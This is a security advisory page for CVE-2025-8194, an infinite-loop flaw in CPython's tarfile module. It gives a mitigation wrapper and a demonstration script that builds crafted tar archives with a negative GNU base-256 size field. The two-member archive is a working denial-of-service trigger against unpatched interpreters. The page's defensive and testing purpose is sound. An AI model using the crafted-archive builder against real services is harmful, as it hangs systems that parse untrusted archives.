
THREATINT
PUBLISHED

CVE-2025-8194

Tarfile infinite loop during parsing with negative member offset



Description

There is a defect in the CPython "tarfile" module affecting the "TarFile" extraction and entry enumeration APIs. The tar implementation accepted archives that encode a negative member offset without raising an error, so parsing a maliciously crafted archive enters an infinite loop and the calling process hangs. Until a fixed interpreter is deployed, the defect can be mitigated by installing the following wrapper after importing the "tarfile" module. It rejects a negative byte count before TarInfo._block rounds it into a block offset; without that check the negative count is rounded exactly like a positive one and the resulting next-header offset can point back at a header that was already read:

    import tarfile

    def _block_patched(self, count):
        # Refuse negative counts before the original _block rounds them,
        # otherwise the computed next-header offset can move backwards.
        if count < 0:  # pragma: no cover
            raise tarfile.InvalidHeaderError("invalid offset")
        return _block_patched._orig_block(self, count)

    # Keep the original method reachable and install the wrapper class-wide,
    # so every TarInfo instance created afterwards goes through the check.
    _block_patched._orig_block = tarfile.TarInfo._block
    tarfile.TarInfo._block = _block_patched

The wrapper must run in every process before any archive is parsed. Upgrading to a release that contains the fix listed under References is the durable remedy.
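The following is an added, self-contained demonstration written for this page; it is not code from CPython or from the advisory, apart from the mitigation wrapper it reuses verbatim. It assumes the standard 512-byte ustar header layout and tarfile's GNU base-256 number decoding (a size field whose first byte is 0xff is negative), and it constructs two sample archives in memory: one where a member claiming size -512 is the first entry, and one where it follows a benign empty file. With the wrapper installed, the first archive is rejected by TarFile.open() and the second terminates after the benign member instead of re-reading the crafted header forever. The helper names (ustar_header, negative_size_field, build_archive, probe, guard_rejects_negative) are this example's own.

```python
import io
import tarfile

# --- The advisory's mitigation, reused verbatim: refuse a negative byte count
# before TarInfo._block rounds it into a block offset that moves backwards.
def _block_patched(self, count):
    if count < 0:  # pragma: no cover
        raise tarfile.InvalidHeaderError("invalid offset")
    return _block_patched._orig_block(self, count)

if tarfile.TarInfo._block is not _block_patched:  # idempotent on re-import
    _block_patched._orig_block = tarfile.TarInfo._block
    tarfile.TarInfo._block = _block_patched


def ustar_header(name, size_field, typeflag=b"0"):
    """Build one 512-byte ustar header with a valid checksum (example helper).

    size_field is the raw 12-byte size field, so a caller can pass either the
    usual octal text or the GNU base-256 binary form that tarfile.nti() decodes.
    """
    hdr = bytearray(tarfile.BLOCKSIZE)
    hdr[0:len(name)] = name
    hdr[100:108] = b"0000644\0"        # mode
    hdr[108:116] = b"0000000\0"        # uid
    hdr[116:124] = b"0000000\0"        # gid
    hdr[124:136] = size_field          # size, 12 bytes
    hdr[136:148] = b"00000000000\0"    # mtime
    hdr[156:157] = typeflag            # b"0": regular file
    hdr[257:265] = b"ustar\x0000"      # magic + version
    # tarfile sums every byte with the 8-byte chksum field taken as spaces;
    # the field is still NUL here, so 256 stands in for those eight spaces.
    hdr[148:156] = b"%06o\0 " % (256 + sum(hdr))
    return bytes(hdr)


def negative_size_field(size):
    """GNU base-256 size field for a negative value: 0xff then 11 bytes of
    two's complement, which tarfile.nti() turns back into the negative int."""
    assert size < 0
    return b"\xff" + size.to_bytes(11, "big", signed=True)


def build_archive(negative_first):
    """Constructed sample archive (not a real-world capture).

    The crafted member claims size -512. Unpatched, tarfile sets the next
    header offset to offset_data + _block(-512) = offset_data - 512, which is
    the offset of the crafted header itself, so a header that is not the first
    one is read again and again. With the guard installed the negative count
    is refused before any offset is computed.
    """
    benign = ustar_header(b"benign.txt", b"%011o\0" % 0)   # empty regular file
    crafted = ustar_header(b"evil.txt", negative_size_field(-512))
    end_of_archive = b"\0" * (2 * tarfile.BLOCKSIZE)
    if negative_first:
        return crafted + end_of_archive
    return benign + crafted + end_of_archive


def probe(archive):
    """Enumerate members with the guard installed.

    Returns (names_yielded, rejected). A crafted first member makes
    TarFile.open() raise ReadError (rejected=True); a crafted later member
    stops enumeration after the good members. Either way the call returns.
    """
    names = []
    rejected = False
    try:
        with tarfile.open(fileobj=io.BytesIO(archive), mode="r:") as tf:
            for member in tf:
                names.append(member.name)
    except tarfile.ReadError:
        rejected = True
    return names, rejected


def guard_rejects_negative(count=-512):
    """True if the wrapped TarInfo._block refuses the given byte count."""
    try:
        tarfile.TarInfo("probe")._block(count)
    except tarfile.InvalidHeaderError:
        return True
    return False


if __name__ == "__main__":
    print(guard_rejects_negative())                      # True
    print(probe(build_archive(negative_first=True)))     # ([], True)
    print(probe(build_archive(negative_first=False)))    # (['benign.txt'], False)
```

Do not run the two-member archive through an interpreter that has neither the fix nor the wrapper: that is the case that loops forever and grows the members list without bound. The checksum helper is what makes the crafted header pass frombuf()'s validation; the only thing wrong with it is the size field, which is exactly what the guard checks.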

Reserved 2025-07-25 | Published 2025-07-28 | Updated 2025-07-28 | Assigner PSF


HIGH: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

Problem types

CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')

Product status

Default status: unaffected
Any version before 3.14.0: affected

Credits

Alexander Urieles (reporter)

Seth Larson (coordinator)

Ethan Furman (remediation reviewer)

Steve Dower (remediation reviewer)

References

github.com/python/cpython/issues/130577 (issue-tracking)

github.com/python/cpython/pull/137027 (patch)

mail.python.org/.../thread/ZULLF3IZ726XP5EY7XJ7YIN3K5MDYR2D/ (vendor-advisory)

github.com/...ommit/7040aa54f14676938970e10c5f74ea93cd56aa38 (patch)

github.com/...ommit/cdae923ffe187d6ef916c0f665a31249619193fe (patch)

cve.org (CVE-2025-8194)

nvd.nist.gov (CVE-2025-8194)

https://cve.threatint.eu/CVE/CVE-2025-8194
